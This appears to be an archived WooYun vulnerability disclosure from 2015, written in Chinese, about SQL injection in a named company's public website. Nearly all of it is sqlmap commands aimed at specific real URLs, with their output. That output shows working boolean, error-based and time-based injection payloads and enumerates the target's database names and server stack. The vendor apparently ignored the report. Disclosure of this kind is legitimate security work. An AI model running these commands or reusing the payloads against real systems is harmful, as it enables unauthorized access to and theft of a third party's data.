乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-13: 细节已通知厂商并且等待厂商处理中 2015-10-18: 厂商已经主动忽略漏洞,细节向公众公开
厂家多注重安全
sqlmap.py -u "http://www.vcanbio.com/investor_articledetail.aspx?id=1'%22"
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=-5465 OR 9250=9250# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: id=-6373 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (1433=1433) THEN 1 ELSE 0 END)),0x71706b6a71,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: id=(SELECT (CASE WHEN (1125=1125) THEN SLEEP(5) ELSE 1125*(SELECT 1125 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: MySQL 5.0.12available databases [9]:[*] db_nmw[*] hezedb[*] information_schema[*] mqmgssspglxt[*] mysql[*] rsdome[*] scdb[*] tj_hzdb[*] vcanbio_zhongyuanxiehe
sqlmap.py -u "www.vcanbio.com//investor_announcementdetail.aspx?id=*"
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: http://www.vcanbio.com:80//investor_announcementdetail.aspx?id=-2175 OR 5046=5046# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: http://www.vcanbio.com:80//investor_announcementdetail.aspx?id=-2495 OR 1 GROUP BY CONCAT(0x717a707071,(SELECT (CASE WHEN (6251=6251) THEN 1 ELSE 0 END)),0x71706a6a71,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: http://www.vcanbio.com:80//investor_announcementdetail.aspx?id=(SELECT (CASE WHEN (1716=1716) THEN SLEEP(5) ELSE 1716*(SELECT 1716 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: MySQL 5.0.12current database: 'vcanbio_zhongyuanxiehe'
sqlmap.py -u "www.vcanbio.com//company_videodata_detail.aspx?id=*"
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: http://www.vcanbio.com:80//company_videodata_detail.aspx?id=-8794 OR 3019=3019# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: http://www.vcanbio.com:80//company_videodata_detail.aspx?id=-3756 OR 1 GROUP BY CONCAT(0x7171627071,(SELECT (CASE WHEN (7398=7398) THEN 1 ELSE 0 END)),0x71626a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: http://www.vcanbio.com:80//company_videodata_detail.aspx?id=(SELECT (CASE WHEN (7617=7617) THEN SLEEP(5) ELSE 7617*(SELECT 7617 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: MySQL 5.0.12current database: 'vcanbio_zhongyuanxiehe'
http://www.vcanbio.com//company_news_detail.aspx?id=*
危害等级:无影响厂商忽略
忽略时间:2015-10-18 09:46
漏洞Rank:4 (WooYun评价)
暂无